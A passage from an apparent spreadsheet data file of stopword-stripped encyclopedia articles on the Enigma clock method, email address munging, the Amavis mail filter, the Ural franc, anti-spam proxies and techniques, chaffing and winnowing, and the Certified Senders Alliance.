coincidence. rotor right, middle rotor would also never match. rotor shows complete agreement. consequently, rightmost rotor would rotor iii. point, poles would know right rotor rotor order either iii) (ii, iii). although knew message key, know ring settings, know absolute positions rotors. they also know plugboard settings. poles could methods learn information, methods would simplified knowing right rotor. utility early clock method important. 1932, germans kept rotor order three months time. february 1936, germans changed rotor order every month. daily wheel order changes started november 1936.in october 1936, germans increased number plugs eight, complicated grill method. poles developed cyclometer card catalog. although method ready year, identified entire rotor order (not right rotor) little work. unfortunately, catalog rendered useless november 1937 germans changed reflector; catalog needed made. september 1938, germans changed procedures messages network grundstellung. change would complicate clock method message longer easily known. british codebreakers extended clock method; banburismus. german naval enigma messages used grundstellung, british codebreakers could determine encrypted message keys. final letter encrypted keys matched, would rotor positions except right rotor. problem british matching plaintext message keys poles) rather encrypted message keys, last letter encrypted message natural "abcde...wxyz" ordering rather arbitrary order. rather looking offset, british look possible offsets infer enough third wheel order could determine right rotor. correctly guessing last rotor could save british valuable bombe time. notes references kozaczuk, władysław (1984), kasparek, christopher (ed.), enigma: german machine cipher broken, read allies world two, frederick, maryland: university publications america, isbn 978-0-89093-547-7 revised augmented translation kręgu enigmy, warsaw, książka wiedza, 1979, supplemented appendices marian rejewski rejewski, marian (july 1981), "how polish mathematicians deciphered enigma", annals history computing, ieee, (3): 213–234, doi:10.1109/mahc.1981.10033 rejewski, marian (1984), "the mathematical solution enigma cipher", kasparek, christopher (ed.), enigma: german machine cipher broken, read allies world two, appendix 272–291, isbn 978-0-89093-547-7 good, jack (1993), "enigma fish", hinsley, stripp, alan (eds.), codebreakers: inside story bletchley park, oxford: oxford university press, 149–166, isbn 978-0-19-280132-6</t>
  </si>
  <si>
    <t>Address munging</t>
  </si>
  <si>
    <t>address munging practice disguising e-mail address prevent automatically collected unsolicited bulk e-mail providers. address munging intended disguise e-mail address prevents computer software seeing real address, even address all, still allows human reader reconstruct original contact author: email address "no-one@example.com", becomes "no-one example com", instance. e-mail address posted public likely automatically collected computer software used bulk emailers process known e-mail address scavenging). addresses posted webpages, usenet chat rooms particularly vulnerable this. private e-mail sent individuals highly unlikely collected, e-mail sent mailing list archived made available web, passed onto usenet news server made public, eventually scanned collected. disadvantages disguising addresses makes difficult people send e-mail other. many attempt symptom rather solving real problem e-mail spam, expense causing problems innocent users. addition, e-mail address harvesters found ways read munged email addresses. address munging usenet contrary recommendations 1036 governing format usenet posts, requires valid e-mail address supplied from: field post. practice, people follow recommendation strictly.disguising e-mail addresses systematic manner (for example, user[at]domain[dot]com) offers little protection.any impediment reduces user's willingness take extra trouble email user. contrast, well-maintained e-mail filtering user's drive away potential correspondents. spam filter 100% immune false positives, however, potential correspondent would deterred address munging instead wasting time long letters merely disappear junk mail folders. commercial entities, maintaining contact forms pages rather publicizing e-mail addresses ensure incoming messages relatively spam-free lost. conjunction captcha fields, spam comment fields reduced effectively zero, except non-accessibility captchas bring deterrent problems address munging itself. alternatives alternative address munging, several "transparent" techniques allow people post valid e-mail address, still make difficult automated recognition collection address: "transparent name mangling" involves replacing characters address equivalent html references list html character entity references, e.g. gets replaced either 'u+0040' '&amp;#64;' gets replaced either 'u+002e' '&amp;#46;' user knowing take dashes. posting part e-mail address image, example, no-oneexample.com, sign disguised image, sometimes alternative text specified allow copy-and-paste, altering address remain outside typical regular expressions spambots. using client-side form e-mail address css3 animated text logo captcha shrinking normal size using inline css. posting e-mail address order characters jumbled restoring order using css. building link client-side scripting. using client-side scripting produce multi email address encrypter. using server-side scripting contact form.an example munging "user@example.com" client-side scripting would images scripts address obfuscation cause problems people using screen readers users disabilities, ignores users text browsers like lynx w3m, although transparent means disadvantage non-english speakers cannot understand plain text bound single language part non-transparent munged addresses instructions accompany them. according 2003 study center democracy technology, even simplest "transparent name mangling" e-mail addresses effective. examples common methods disguising addresses include: reserved top-level domain .invalid appended ensure real e-mail address inadvertently generated. references also internet netiquette</t>
  </si>
  <si>
    <t>Amavis</t>
  </si>
  <si>
    <t>amavis open-source content filter electronic mail, implementing mail message transfer, decoding, processing checking, interfacing external content filters provide protection spam viruses malware. considered interface mailer (mta, mail transfer agent) content filters.amavis used detect viruses, spam, banned content types syntax errors mail messages block, tag, redirect (using sub-addressing), forward mail depending content, origin size quarantine (and release), archive mail messages files, mailboxes, relational database sanitize passed messages using external sanitizer generate dkim signatures verify dkim signatures provide dkim-based whitelistingnotable features: provides snmp statistics status monitoring using extensive variables provides structured event json format ipv6 protocol supported interfacing, ipv6 address forms mail header section properly honors per-recipient settings even multi-recipient messages, scanning message once. supports international email (rfc 6530, smtputf8, eai, idn)a common mail filtering installation amavis consists postfix mta, spamassassin spam classifier, clamav anti-virus protection, running unix-like operating system. many virus scanners (about spam scanners (crm114, dspam, bogofilter) supported, too, well mtas. interfacing topology three topologies interfacing supported. amavisd process sandwiched instances mta, yielding classical after-queue mail filtering setup, amavisd used smtp proxy filter before-queue filtering setup, amavisd process consulted provide mail classification forward mail message itself, case consulting client remains charge mail forwarding. this last approach used milter setup (with limitations), historical client program amavisd-submit. since version 2.7.0 before-queue setup preferred, allows mail message transfer rejected smtp session sending client. after-queue setup filtering takes place mail message already received enqueued mta, case mail filter longer reject message, deliver (possibly tagged), discard generate non-delivery notification, cause unwanted backscatter case bouncing message fake sender address. disadvantage before-queue setup requires resources (cpu, memory) proportional current (peak) mail transfer rate, unlike after-queue setup, delay acceptable resource usage corresponds average mail transfer rate. with introduction option smtpd_proxy_options=speed_adjust postfix 2.7.0 resource requirements before-queue content filter much reduced.in countries legislation permit mail filtering discard mail message accepted mta, rules after-queue filtering setup discarding quarantining messages, leaves possibility delivering (possibly tagged) messages, rejecting before-queue setup (smtp proxy milter). interfacing protocols amavis receive mail messages sockets protocol families pf_inet (ipv4), pf_inet6 (ipv6) pf_local (unix domain socket), protocols smtp, lmtp, simple private protocol am.pdp used helper program like amavisd-milter interface milters. output side protocols smtp lmtp used pass message back-end instance lda, message passed spawned process unix pipe. when smtp lmtp used, session optionally encrypted using starttls (rfc 3207) extension protocol. smtp command pipelining (rfc 2920) supported client server code. interfacing spamassassin when spam scanning enabled, daemon process amavisd conceptually similar spamd process spamassassin project. cases forked child processes call spamassassin perl modules directly, hence performance similar. main difference protocols used: amavis typically speaks standard smtp protocol mta, spamc/spamd case typically spawns spamc program passing message unix pipe, spamc process transfers message spamd daemon using private protocol, spamd calls spamassassin perl modules. design priorities design priorities amavisd-new (from called amavis) are: reliability, security, adherence standards, performance, functionality. reliability with intention mail message could lost unexpected events like failures, resources depletion unexpected program terminations, amavisd program meticulously checks completion status every system call operation. unexpected events logged possible, handled several layers event handling. amavis never takes responsibility mail message delivery away mta: final success status reported message passed back-end instance reception confirmed. case fatal failures processing transferring message, message processed stays queue front-end instance, re-tried later. this approach also covers potential unexpected host failures, crashes amavisd process components. program resources like memory size, file descriptors, disk usage creation subprocesses controlled. large mail messages kept memory, available memory size impose limit size mail messages processed, memory resources wasted unnecessarily. security great deal attention given security aspects, required handling potentially malicious, nonstandard garbled data mail messages coming untrusted sources. process handling mail messages runs reduced privileges dedicated user optionally chroot-ed. risks buffer overflows memory allocation bugs largely avoided implementing protocol handling mail processing perl, handles dynamic memory management transparently. care taken content processed messages inadvertently propagate system. perl provides additional security safety marking tainted data originating wild, amavis careful perl feature good avoiding automatic untainting data (use "taint") untainting explicitly strategic points, late data flow. amavis several external programs enhance functionality. these de-archivers, de-compressors, virus scanners spam scanners. programs often implemented languages like c++, potential risk mail message passed programs cause failure even open security hole. risk limited running programs unprivileged user possibly chroot-ed. nevertheless, external programs like unmaintained de-archivers avoided. external programs configurable, disabled selectively group (like decoders virus scanners). performance despite implemented interpreted programming language perl, amavis slow. good performance functionality implemented amavis (not speaking external components) achieved dealing data large chunks (e.g. line-by-line), avoiding unnecessary data copying, optimizing frequently traversed code paths, using suitable data structures algorithms, well low-level optimizations. bottlenecks detected development profiling code benchmarking. detailed timing report help recognize bottlenecks particular installation. certain external modules programs like spamassassin command-line virus scanners slow, using would constitute vast majority elapsed time processing resources, making resources used amavis proportionally quite small. components like external mail decoders, virus scanners spam scanners selectively disabled needed. what remains functionality implemented amavis itself, like transferring mail message using smtp lmtp protocol, checking mail header section validity, checking banned mail content types, verifying generating dkim signatures. consequence, mail processing tasks like dkim signing verification (with mail checking disabled) exceptionally fast rival implementations compiled languages. even full checks using fast virus scanner spam scanning disabled surprisingly fast. adherence standards implementation protocols message structures closely follows applicable standards 5322, 5321, 2033, 3207, 2045, 2046, 2047, 3461, 3462, 3463, 3464, 4155, 5965, 6376, 5451, 6008, 4291. several cases functionality re-implemented amavis code even though public (cpan) perl module exists, lacks attention detail following standard lacks sufficient checking handling errors. license amavis licensed gplv2 license. this applies current code, well historical branches. exception supporting programs (like monitoring statistics reporting), covered license. project project started 1997 unix shell script detect block e-mail messages containing virus. intended block viruses (mail transfer agent) (local delivery) stage, running unix-like platform, complementing virus protection mechanisms running end-user personal computers. next tool re-implemented perl program, later evolved daemonized process. dozen developers took turns first five years project, developing several variants keeping common goal, project name development infrastructure. since december 2008 (until 2018-10-09) active branch officially amavisd-new, developed maintained mark martinec since march 2002. this agreed developers time private correspondence: christian bricart, lars hecking, hilko bengen, rainer link mark martinec. project name amavis largely interchangeable name amavisd-new branch. much functionality added years, like adding protection spam unwanted content, besides original virus protection. focus kept reliability, security, adherence standards performance. domain amavis.org project registered 1998 christian bricart, early developers, still maintaining domain name registration. domain entirely dedicated active branch. project mailing list moved sourceforge amavis.org march 2011, hosted ralf hildebrandt patrick koetter. project page main distribution site located jožef stefan institute, ljubljana, slovenia (until handover 2018), development taking place years 2002 2018. change project leaders announcement october 2018 mark martinec announced general support discussion mailing list retirement project also patrick koetter continue project leader. know personally, authors book postfix, uses amavis professional life too, think project good hands. after patrick notified migration source code public gitlab repository plan next steps regarding project development. branches project name through history project name project branches varied somewhat. initially spelling project name amavis mail virus scanner), introduced christian bricart. with rewrite perl name program amavis-perl. daemonized versions initially distributed name amavisd-snapshot amavisd. modular rewrite hilko bengen called amavis-ng. march 2002 amavisd-new branch introduced mark martinec, initially patch amavisd-snapshot-20020300. this later evolved self-contained project, surviving actively maintained branch. nowadays project name preferably spelled amavis (while name program amavisd). name amavis mostly interchangeable amavisd-new. history project shell program 1997 (original code mogens kjær carlsberg laboratory, modified jürgen quade) initial, released officially 1998-01-17 amavis (christian bricart) amavis, first official release 1998-01-28 amavis 0.1.1 1998-12-08 amavis 0.2.0-pre1 1999-02-25 amavis 0.2.0-pre2 1999-03-29 amavis 0.2.0-pre3 1999-03-31 amavis 0.2.0-pre4 1999-07-19 amavis 0.2.0-pre5 1999-07-20 amavis 0.2.0-pre6 2000-10-31 amavis 0.2.1 (christian bricart, rainer link, chris mason) perl program 2000-01 amavis-perl (chris mason) 2000-08 amavis-perl-8 2000-12 amavis-perl-10 2001-04 amavis-perl-11 (split amavisd) 2003-03-07 amavis-0.3.12 (lars hecking) perl daemon: amavisd 2001-01 daemonization (geoff winkless) 2001-04 amavisd-snapshot-20010407 (lars hecking) 2001-07 amavisd-snapshot-20010714 2002-03 amavisd-snapshot-20020300 (split amavisd-new) 2003-03-03 amavisd-0.1 perl, modular re-design (hilko bengen) 2002-03 amavis-ng-0.1 2003-03 amavis-ng-0.1.6.2 amavisd-new (mark martinec) 2002-03-30 amavisd-new, pre-forked, net::server 2002-05-17 2002-06-30 packages, lookups 2002-11-16 integrated file 2002-12-27 2003-03-14 ldap lookups 2003-06-16 2003-08-25 2003-11-10 @*_maps 2004-01-05 2004-03-09 2004-04-02 2004-06-29 2004-07-01 policy banks, ipv6 address formats 2004-08-15 2.1.0 amavisd-nanny monitoring utility 2004-09-06 2.1.2 2004-11-02 2.2.0 2004-12-22 2.2.1 2005-04-24 2.3.0 @decoders, per-recipient banning rules 2005-05-09 2.3.1 2005-06-29 2.3.2 2005-08-22 2.3.3 2006-04-02 2.4.0 smtp, %*_by_ccat 2006-05-08 2.4.1 2006-06-27 2.4.2 pals, logging quarantine 2006-09-30 2.4.3 2006-11-20 2.4.4 2007-01-30 2.4.5 2007-04-23 2.5.0 blocking content categories, rewritten smtp client 2007-05-31 2.5.1 amavisd-requeue 2007-06-27 2.5.2 2007-12-12 2.5.3 2008-03-12 2.5.4 2008-04-23 2.6.0 dkim, bounce killer, 2008-06-29 2.6.1 2008-12-12 amavis amavisd-new 2008-12-15 2.6.2 2009-04-22 2.6.3 support crm114 dspam, truncation 2009-06-25 2.6.4 monitoring snmp 2010-04-25 2.7.0-pre4 2011-02-03 2.7.0-pre14 2011-03-07 mailing list moved sourceforge amavis.org 2011-04-07 2.6.5 2011-05-19 2.6.6 2011-06-01 2.7.0 pre-queue improvements, speedup 2012-04-29 2.7.1 2012-06-30 2.7.2 2012-06-30 2.8.0 instead bdb, performance optimizations 2013-04-27 2.8.1-rc1 2013-06-28 2.8.1 redis pals storage 2013-09-04 2.8.2-rc1 (2.8.2 released) 2014-05-09 2.9.0 structured json format, address auto-reputation 2014-06-27 2.9.1 2014-10-22 2.10.0 internationalized email (rfc 6530, smtputf8, eai, idn) 2014-10-22 2.10.1 2016-04-26 2.11.0 2018-10-09 2.11.1 minor updates, prior migration gitlab repository also list antivirus software spamassassin, popular open source spam classifier references external links official website</t>
  </si>
  <si>
    <t>Ural franc</t>
  </si>
  <si>
    <t>ural franc (уральский франк) scrip issued sverdlovsk (yekaterinburg) russia 1991 team businessmen politicians headed anton bakov. 1990s former ussr structures collapsing undergoing large-scale transformations stresses. 1991 future russian state uncertain idea separate money reasonable maintain local economics, never implemented. 1993 short-lived project ural republic area. nowadays widely thought francs made denied involved people, primarily bakov participated both: separate currency russian ruble generally illegal time. banknotes later used money substitute 1997–2000 "city-forming" serov metallurgical plant northern sverdlovsk oblast's serov town bakov served director. notes, came denominations 100, 1000 francs (франков). they made according sketches architect sophia demidova goznak factory perm city. nowadays numismatic value exhibited museums. 2021, mark ural franc's 30th anniversary, creator anton bakov issued silver coin also called ural franc. coins issued weighting grams each. they supposed interest numismatics intended launched money illegal russia. however, bakov assigned cryptocurrency status within binance blockchain network token uralfranc declared might issue coins demand. coin features hand-drawn portrait bogdashko toporok supposed 17th century ancestor bakov. references</t>
  </si>
  <si>
    <t>Anti-Spam SMTP Proxy</t>
  </si>
  <si>
    <t>anti-spam smtp proxy (assp) open-source, perl based, platform-independent transparent smtp proxy server. features some assp's features are: hidden markov model spam filtering bayesian spam filtering whitelisting penalty (pb) trapping dnsbl/rbl (realtime blackhole listing) uribl (uniform resource identifier black listing) multi-level (sender policy framework) validation blocking dkim signing validation dmarc validation reporting (sender rewriting scheme) fix-up session delaying/greylisting connection response delaying sender validation recipient validation multi-level attachment blocking (based block lists allow lists content based executable blocking) well multiple validation mechanisms. multi-threaded (since version 2.x) platform independent (written perl) also transparent smtp proxy spamassassin, popular open source spam filtering uses razor techniques detect spam. qpsmtpd, similar project external links assp official homepage assp sourceforge project page forum assp wiki assp beta development site assp deluxe cpanel/whm frontend assp</t>
  </si>
  <si>
    <t>Chaffing and winnowing</t>
  </si>
  <si>
    <t>chaffing winnowing cryptographic technique achieve confidentiality without using encryption sending data insecure channel. name derived agriculture: grain harvested threshed, remains mixed together inedible fibrous chaff. chaff grain separated winnowing, chaff discarded. cryptographic technique conceived rivest published on-line article march 1998. although bears similarities traditional encryption steganography, cannot classified either category. this technique allows sender deny responsibility encrypting message. when using chaffing winnowing, sender transmits message unencrypted, clear text. although sender receiver share secret key, authentication. however, third party make communication confidential simultaneously sending specially crafted messages channel. works sender (alice) wants send message receiver (bob). simplest setup, alice enumerates symbols (usually bits) message sends separate packet. general method requires symbol arrive in-order authenticated receiver. when implemented networks change order packets, sender places symbol's serial number packet, symbol (both unencrypted), message authentication code (mac). many macs secret alice shares bob, sufficient receiver method authenticate packets. charles, transmits alice's packets bob, interleaves packets corresponding bogus packets (called "chaff") corresponding serial numbers, arbitrary symbols, random number place mac. charles need know (real large enough extremely unlikely generate valid chance, unlike example). uses find authentic messages drops "chaff" messages. this process called "winnowing". eavesdropper located alice charles easily read alice's message. eavesdropper charles would tell packets bogus real (i.e. winnow, "separate wheat chaff"). that infeasible used secure charles leak information packet authenticity (e.g. timing). fourth party joins example (named darth) wants send counterfeit messages impersonate alice, would require alice disclose secret key. darth cannot force alice disclose authentication (the knowledge would enable forge messages alice), messages remain confidential. charles, hand, target darth's all, since charles even possess secret keys could disclosed. variations simple variant chaffing winnowing technique described adds many bits overhead original message. make transmission efficient, alice process message all-or-nothing transform send much larger chunks. chaff packets modified accordingly. because original message reconstructed knowing chunks, charles needs send enough chaff packets make finding correct combination packets computationally infeasible. chaffing winnowing lends especially well packet-switched network environments internet, message (whose payload typically small) sent separate network packet. another variant technique, charles carefully interleaves packets coming multiple senders. that eliminates need charles generate inject bogus packets communication. however, text alice's message cannot well protected parties communicating charles time. this variant also helps protect information leakage traffic analysis. implications enforcement rivest suggests laws related cryptography, including export controls, would apply chaffing winnowing employ encryption all. power authenticate many cases power control, handing authentication power government beyond reason author paper proposes security implications handing everyone's authentication keys government law-enforcement purposes would risky, since possession would enable someone masquerade communicate another entity, airline controller. furthermore, rivest contemplates possibility rogue enforcement officials framing innocent parties introducing chaff communications, concluding drafting restricting chaffing winnowing would difficult. trivia term winnowing suggested ronald rivest's father. before publication rivest's paper 1998 people brought attention 1965 novel, stout's doorbell rang, describes concept thus included paper's references. also null cipher email spam unsolicited electronic advertising e-mail references</t>
  </si>
  <si>
    <t>Certified Server Validation</t>
  </si>
  <si>
    <t>certified server validation (csv) technical method email authentication intended fight spam. focus smtp helo-identity mail transfer agents. designed address problems marid asrg, defined detail intent lightweight authentication protocol (lmap) expired asrg draft. january 2007, internet drafts expired mailing list closed since traffic months. principles operation considers questions start smtp session: does domain's management authorize sending email? reputable independent accreditation services consider domain's policies practices sufficient controlling email abuse?csv answers questions follows: validate smtp session unknown sending smtp client using csv, receiving smtp server: obtains remote address connection. extracts domain name helo command sent smtp client. queries confirm domain name authorized (csa). asks reputable accreditation service good reputation (dna). determines level trust give sending smtp client, based results (4)if level trust high enough, process email session traditional manner, delivering forwarding without need validation. level trust low, return error showing reason trusting sending smtp client. level trust between, document result header email delivered forwarded, and/or perform additional checks. answers questions article 'yes', receivers expect email received email want. mail sources motivated make answers yes, easy (unless email flow toxic reputable independent accreditation service vouch them). designed efficient elegant, respect certainly beats spf's coverage helo identities. client smtp authorization (csa) proposed mechanism whereby domain admin advertise mail servers legitimate originators mail his/her domain. this done providing appropriate infrastructure. external links home page clear list archive specification client smtp authorization domain name accreditation john leslie's material dave crocker's anti-spam material; datamation article idea that's simple brilliant could actually succeed." tony's quick guide</t>
  </si>
  <si>
    <t>Anti-spam techniques (users)</t>
  </si>
  <si>
    <t>this page client side techniques. server side techniques read anti-spam techniques page.people tend much less bothered spam slipping filters mail (false negatives), desired e-mail ("ham") blocked (false positives). trying balance false negatives (missed spams) false positives (rejecting good e-mail) critical successful anti-spam system. servers able block spam tools individual users help control balance. end-user techniques there number techniques individuals restrict availability e-mail addresses, reducing preventing attractiveness spam. discretion sharing email address among limited group correspondents limit spam. this method relies discretion members group, disclosing email addresses outside group circumvents trust relationship group. reason, forwarding messages recipients know another avoided. when absolutely necessary forward messages recipients know another, good practice list recipient names "bcc:" instead "to:". this practice avoids scenario unscrupulous recipients might compile list email addresses spamming purposes. this practice also reduces risk address distributed computers affected email address harvesting malware. however, privacy email address lost divulgence, cannot likely regained. address munging posting anonymously, fake name address, avoid e-mail address harvesting, users ensure fake address valid. users want receive legitimate email regarding posts sites alter addresses humans figure spammers cannot. instance, example.com might post joenos pam.invalid.example.com. address munging, however, cause legitimate replies lost. user's valid address, truly invalid, otherwise someone server still spam other ways transparent address munging avoid allowing users actual address obfuscate automated email harvesters methods displaying part e-mail address page image, text logo shrunken normal size using in-line css, jumbled text order characters restored using css. avoid responding spam spammers often regard responses messages—even responses like "don't spam me"—as confirmation email address valid. likewise, many spam messages contain links addresses user directed follow removed spammer's mailing list. several cases, spam-fighters tested links, confirming lead recipient address's removal—if anything, lead spam. this removal request filing complaint address list washed. lower complaints spammer stay active acquire accounts and/or internet provider. sender addresses often forged spam messages, including using recipient's address forged sender address, responding spam result failed deliveries reach innocent e-mail users whose addresses abused. usenet, widely considered even important avoid responding spam. many isps software seek destroy duplicate messages. someone spam respond cancelled server, effect reposting spam them; since duplicate, reposted copy last longer. replying also cause poster falsely linked part spam message. contact forms contact forms allow users send email filling forms browser. server takes form data, forwarding email address. users never email address. such forms, however, sometimes inconvenient users, able preferred e-mail client, risk entering faulty reply address, typically notified delivery problems. further, contact forms drawback require website supports server side scripts. finally, software used contact forms badly designed, become spam tool right. additionally, spammers begun send spam using contact form. disable html e-mail many modern mail programs incorporate browser functionality, display html, urls, images. this easily expose user offensive images spam. addition, spam written html contain bugs allows spammers e-mail address valid message caught spam filters. javascript programs used direct user's browser advertised page, make spam message difficult close delete. spam messages contained attacks upon security vulnerabilities html renderer, using holes install spyware. (some computer viruses borne mechanisms.) mail clients automatically download display html, images attachments, fewer risks, clients configured display default. disposable e-mail addresses email user sometimes need give address site without complete assurance site owner sending spam. mitigate risk provide disposable email address—a temporary address user disable abandon forwards email real account. number services provide disposable address forwarding. addresses manually disabled, expire given time interval, expire certain number messages forwarded. disposable email addresses used users track whether site owner disclosed address. this capability resulted legal jeopardy sites disclose confidential addresses without permission. passwords systems passwords unrecognised senders include email password demonstrates email message "ham" (not spam) message. typically email address password would described page, password would included "subject" line email address. passwords often combined filtering systems, counter risk filtering system accidentally identify message spam message.the "plus addressing" technique appends password "username" part email address. reporting spam tracking spammer's reporting offense lead spammer's service terminated criminal prosecution. unfortunately, difficult track spammer—and online tools assist, always accurate. occasionally, spammers employ netblocks. case, abuse contact netblock spammer confirm address. examples online tools spamcop network abuse clearinghouse. they provide automated semi-automated means report spam isps. some spam-fighters regard inaccurate compared expert email system however, email users experts. free tool called complainterator used reporting spam. complainterator send automatically generated complaint registrar spamming domain registrar name servers. historically, reporting spam seriously abated spam, since spammers simply move operation another url, network addresses. consumers also forward unwanted deceptive commercial email email address (spam uce.gov) maintained federal trade commission (ftc). database collected used prosecute perpetrators scam deceptive advertising. alternative contacting isps contact registrar domain name used spam e-mail. registrars, icann-accredited administrative organizations, obliged uphold certain rules regulations, resources necessary dealing abuse complaints. responding spam some advocate responding aggressively spam—in words, "spamming spammer". basic idea make spamming less attractive spammer, increasing spammer's overhead. there several ways reach spammer, besides caveats mentioned above, lead retaliations spammer. replying directly spammer's email addressjust clicking "reply" work vast majority cases, since sender addresses forged made cases, however, spammers provide valid addresses, case nigerian scams. targeting computers used send spam 2005, announced service bounce spam directly computers send spam. because addresses identified headers every message, would possible target computers directly, sidestepping problem forged email addresses. cases, however, computers belong real spammer, unsuspecting users unsecured outdated systems, hijacked malware controlled distance spammer; known zombie computers. however, legal jurisdictions, ignorance defense, many victims spam regard owners zombie computers willfully compliant accomplices spammers.leaving messages spamvertised site spammers selling wares need tangible point contact customers reach them. sometimes telephone number, often site containing forms customers fill orders inquiries, even "unsubscribe" requests. since positive response spam probably much less 1/10,000, tiny percentage users visit spam sites leave negative messages, negative messages could easily outnumber positive ones, incurring costs spammers sort out, mentioning cost bandwidth. automated system, designed respond way, blue frog. unfortunately, risk arousing criminals respond threats 'target' address even spam. automated techniques e-mail senders there variety techniques e-mail senders make sure send spam. failure control amount spam sent, judged e-mail receivers, often cause even legitimate email blocked sender dnsbls. background checks users customers since spammer's accounts frequently disabled violations abuse policies, constantly trying create accounts. damage done isp's reputation source spam, many isps email providers captchas accounts verify real human registering account, automated spamming system. they also verify credit cards stolen accepting customers, check spamhaus project rokso list, background checks. confirmed opt-in mailing lists difficulty implementing opt-in mailing lists many means gathering user email addresses remain susceptible forgery. instance, company puts form allow users subscribe mailing list products, malicious person enter people's email addresses harass them, make company appear spamming. anti-spammers, company sends e-mail forgery victims, spamming, albeit inadvertently.) prevent abuse, maps anti-spam organizations encourage mailing lists confirmed opt-in (also known verified opt-in double opt-in). that whenever email address presented subscription list, list software send confirmation message address. confirmation message contains advertising content, construed spam address added live mail list unless recipient responds confirmation message. also spamhaus mailing lists spam lists page. modern mailing list management programs (such mailman, listserv, majordomo, qmail's ezmlm) support confirmed opt-in default. egress spam filtering e-mail senders type anti-spam checks e-mail coming users customers done e-mail coming rest internet. limit e-mail backscatter sort bounce message anti-virus warning gets sent forged email address, result backscatter. problems sending challenges forged e-mail addresses greatly reduced creating message contains challenge. instead, challenge placed bounce message receiving mail system gives rejection-code smtp session. when receiving mail system rejects e-mail way, sending system actually creates bounce message. result, bounce message almost always sent real sender, format language sender usually recognize. port blocking firewalls routers programmed allow smtp traffic (tcp port machines network supposed mail transfer agents send e-mail. this practice somewhat controversial isps block home users, especially isps allow blocking turned upon request. e-mail still sent computers designated smart hosts port smart hosts e-mail submission port 587. port interception network address translation used intercept port (smtp) traffic direct mail server enforces rate limiting egress spam filtering. this commonly done hotels, cause e-mail privacy problems, well making impossible starttls smtp-auth port submission port used. rate limiting machines suddenly start send much e-mail well become zombie computers. limiting rate e-mail sent around typical computer question, legitimate e-mail still sent, large spam runs slowed manual investigation done. spam report feedback loops monitoring spam reports places spamcop, aol's feedback loop, network abuse clearinghouse, domain's abuse@ mailbox, etc., isps often learn problems seriously damage isp's reputation mail servers blacklisted. from field control both malicious software human spam senders often forged from addresses sending spam messages. control enforced smtp servers ensure senders correct email address from field outgoing messages. email users database user record e-mail address. smtp server must check email address from field outgoing message address belongs user's credentials, supplied smtp authentication. from field forged, smtp error returned email client (e.g. "you email address trying send from"). strong agreements most isps webmail providers either acceptable policy (aup) terms service (tos) agreement discourages spammers using system allows spammer terminated quickly violations. techniques researchers enforcement increasingly, anti-spam efforts co-ordination enforcement, researchers, major consumer financial service companies internet service providers monitoring tracking e-mail spam, identity theft phishing activities gathering evidence criminal cases. legislation enforcement appropriate legislation enforcement significant impact spamming activity. penalty provisions australian spam 2003 dropped australia's ranking list spam-relaying countries email spam tenth twenty-eighth.legislation provides mandates bulk emailers must follow makes compliant spam easier identify filter out. analysis spamvertisements analysis sites spamvertised given piece spam often leads questionable registrations internet domain names. since registrars required maintain trustworthy whois databases, digging registration details complaining proper locations often results site shutdowns. uncoordinated activity effective, given today's volume spam rate criminal organizations register domains. however, coordinated effort, implemented adequate infrastructure, obtain good results. other cost-based systems since spamming facilitated fact large volumes email inexpensive send, proposed solutions would require senders cost order send email, making prohibitively expensive spammers. anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers. other techniques there number proposals sideband protocols assist smtp operation. anti-spam research group (asrg) internet research task force (irtf) working number email authentication proposals providing simple source authentication flexible, lightweight, scalable. recent internet engineering task force (ietf) activities include marid (2004) leading approved ietf experiments 2005, domainkeys identified mail 2006. dmarc, stands "domain-based message authentication, reporting conformance" standardizes email receivers perform email authentication using well-known sender policy framework (spf) dkim mechanisms.channel email proposal sending email attempts distribute anti-spam activities forcing verification (probably using bounce messages back-scatter occur) first email sent contacts. smtp proxy smtp proxies allow combating spam real time, combining sender's behavior controls, providing legitimate users immediate feedback, eliminating need quarantine. statistical content filtering statistical bayesian) filtering requires administrative maintenance instead, users mark messages spam nonspam filtering software learns judgements. thus, statistical filter reflect software author's administrator's biases content, rather user's biases. example, biochemist researching viagra messages containing word "viagra" automatically flagged spam, "viagra" show often legitimate messages. still, spam emails containing word "viagra" filtered content rest spam messages differs significantly content legitimate messages. statistical filter also respond quickly changes spam content, without administrative intervention, long users consistently designate false negative messages spam received email. statistical filters also look message headers, thereby considering content also peculiarities transport mechanism email. typical statistical filtering uses single words calculations decide message classified spam not. powerful calculation made using groups words taken together. then random "noise" words used successfully fool filter. software programs implement statistical filtering include bogofilter, dspam, spambayes, assp, e-mail programs mozilla mozilla thunderbird, mailwasher, later revisions spamassassin. another interesting project crm114 hashes phrases bayesian classification phrases. there also free mail filter popfile, sorts mail many categories user wants (family, friends, co-worker, spam, whatever) bayesian filtering. research conferences spam subject several research conferences, including: messaging anti-abuse working group trec (july 2007) conference email anti-spam, august 2007 spam summit, july 2007 spam conference, march 2007 also mailchannels references</t>
  </si>
  <si>
    <t>Certified Senders Alliance</t>
  </si>
  <si>
    <t>certified senders alliance initiated german direct marketing association (ddv) constitutes central whitelist since 2004. whitelist positive list email bulk senders. with isps email-providers participating whitelist, solicited email need enter isps' spamfilter longer chances false positives (legitimate email erroneously tagged spam) reduced. bulk email senders apply certification whitelist. they comply admission criteria, closed-loop authentication, providing masthead, revocation unsubscribe functions, clear identity, sole technological control servers used send emails more.applicants submit samples services, prove criteria implemented. they also fee. applications reviewed certification committee. date, providers participate whitelist. cooperates eco's complaints office, internet users report breaches criteria. frequently discloses, members breached criteria, excluded whitelist. among providers joined whitelist are: aol, arcor, freenet, host europe group, microsoft, vodafone kabel deutschland pironet, united internet companies gmx, internet web.de well yahoo yandex. once year, holds congress "csa summit" current legal requirements regarding email marketing discussed, general data protection regulation well technical challenges trends. references external links homepage certified senders alliance certified senders alliance (german) marketing-börse certified senders alliance (german)</t>
  </si>
  <si>
    <t>Anti-spam techniques</t>
  </si>
  <si>
